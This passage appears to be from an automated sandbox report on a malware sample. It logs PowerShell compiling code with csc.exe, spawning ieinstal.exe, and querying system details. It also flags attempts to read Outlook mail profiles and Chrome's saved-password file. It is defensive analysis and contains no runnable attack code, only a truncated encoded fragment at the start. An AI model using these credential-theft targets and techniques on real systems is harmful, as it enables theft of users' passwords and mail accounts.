AAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uotckr0j.cmdline
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vybs2gqu.cmdline
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES34E6.tmp" "c:\Users\user\AppData\Local\Temp\CSC77023F4354E6477E97855CB603CA0.TMP"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES728B.tmp" "c:\Users\user\AppData\Local\Temp\CSC9CB81DB86B7E400B9F74BAF89293FF3.TMP"
            Source: ieinstal.exe, 00000007.00000002.16989269284.000000001EA43000.00000004.00000010.sdmp, ieinstal.exe, 00000007.00000002.16982053699.0000000003840000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: ieinstal.exe, 00000007.00000002.16982053699.0000000003840000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: ieinstal.exe, 00000007.00000002.16982053699.0000000003840000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: ieinstal.exe, 00000007.00000002.16982053699.0000000003840000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_08985328 cpuid 9_2_08985328
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_083C54A4 CreateNamedPipeW,3_2_083C54A4

            Stealing of Sensitive Information:

            barindex
            Tries to steal Mail credentials (via file / registry access)Show sources
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
